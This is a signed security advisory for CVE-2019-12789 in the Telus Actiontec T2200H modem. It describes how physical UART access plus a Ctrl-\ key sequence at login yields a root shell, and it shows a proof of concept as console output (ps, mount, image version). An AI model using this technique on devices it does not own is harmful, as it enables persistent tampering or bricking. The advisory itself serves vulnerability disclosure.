-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ### Device Details Discovered By: Andrew Klaus (andrew@aklaus.ca) Vendor: Actiontec (Telus Branded) Model: T2200H Affected Firmware: T2200H-31.128L.08 Device Manual: http://static.telus.com/common/cms/files/internet/telus_t2200h_user_manu al.pdf Reported: Sept 2018 CVE: CVE-2019-12789 The Telus Actiontec T2200H is bonded VDSL2 modem. It incorporates 2 VDSL2 bonded links with a built-in firewall, bridge mode, 802.11bgn wireless, etc. ### Summary of Findings By attaching an adapter, such as a Raspberry Pi or other UART adpter, to the UART pins on the system board, an attacker can use a special key sequence (Ctrl-\) to obtain a shell with root privileges at the login prompt. After gaining root access, the attacker can mount the linux /dev/md* jffs2 partitions read-write and make permanent modifications to the device including disabling features such as remote management, vendor updating, etc. It can also be used to overwrite the flash storage, permanently bricking the device. Other note: I was also able to cross-compile a new full-functionality BusyBox binary using https://buildroot.org/. By plugging in a USB Mass Storage Device on the rear of the modem, I was able to dump the firmware using “busybox dd”. ### PoC (UART output) Login: Password: (Ctrl+\) …. (Long stack trace) …. # # cat /etc/image_version T2200H-311288BGW1521450 # ps aux PID USER VSZ STAT COMMAND 233 admin 1980 R -/bin/sh 251 admin 0 DW< [kthread] 269 admin 0 SW [kpAliveWatchdog] 301 admin 0 SW [bcmsw] 302 admin 0 SW [bcmsw_timer] 355 500 2344 S /bin/dbus-daemon --system 372 admin 1976 S syslogd -n -C -l 5 373 admin 1952 S klogd -n 911 admin 1732 S /bin/wlevt 1041 admin 0 SW [dsl0] 1273 admin 7084 S swmdk 1401 admin 1800 S ./pmd 1451 admin 5304 S smbd -D 1540 admin 7084 S swmdk 1541 admin 7084 S swmdk 1544 admin 7084 S swmdk 1569 admin 5304 S smbd -D 1661 admin 1304 S /bin/lld2d br0 1785 admin 1240 S /bin/eapd 1803 admin 1676 S /bin/nas 2129 admin 1344 S /bin/acsd 2175 admin 3132 R /bin/wps_monitor 2262 admin 3916 S ./data_center 5941 admin 2924 S dhcp6s -c /var/dhcp6s.conf br0 6018 admin 896 S radvd -C /var/radvd.conf # mount rootfs on / type rootfs (rw) mtd:rootfs on / type jffs2 (ro,relatime) proc on /proc type proc (rw,relatime) tmpfs on /var type tmpfs (rw,relatime,size=420k) tmpfs on /mnt type tmpfs (rw,relatime,size=16k) sysfs on /sys type sysfs (rw,relatime) mtd:data on /data type jffs2 (rw,relatime) -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEE/rRUDraOzqmrp8tZoyRid8jQfpkFAlz+o4YACgkQoyRid8jQ fpmpew//TgspXRJd2FDlrzMH1HVamuKgu5GJWld2HhDSzFKf4geJ514S9w2vgb9n 0QqB0lm9mrz6dk0GyjlorxwxFot2r0RjW90Bwu1Zo0uLNp8iG2aJGDTY6km7UufS QSSmSUaZot8E/x1UqZpRcbyBjdfJc8X11aHorHXq7j7UQYvmD1vcujM180zxb8eE +8kHFNG1u77PjFH824hVdtfQj2Jq++yzpIf3WJsidmMqzS/a5af7BePHgO5upXyC SL5sh5KMaGjJq/rfGr+V8/JL8ClHqQ61IX0qnkzCNMdis0ZVEfGp42GcauEn6Kd2 iyJNJEq6MmQ3wGd0INsTcCMwj4nCBxEyDougZD2gBxTgMBqcWrZo1PlzISWLmhcE KFjqIBlVOvCXURh0cT+6lRsmAYdywXnLq3qbzjpDeEoXemZ4lkxEQOztxnRzr66K SJ2Jf2wTIzO0IFkT3xktqi5VyloqUniigcZb9reK5ou1/c3Kn9kdYzsnPGokMdlk 75HXO31cDQJCLrLh2OmpoZP0Wle8+mkFengMoMBkxsi4DqHa9tcnqxZXf8zJYc6j cd4f6SZjHOmV3uphqlLpgLIvBegF1cPESeMqPaLg6m9kpQSp5BbQGz9nMK22Do6+ sBaH/+4H1fRbVgppKbuuI8Xe4qCqCrvlaPd8nMS5x8IUBhSvySo= =uXY3 -----END PGP SIGNATURE-----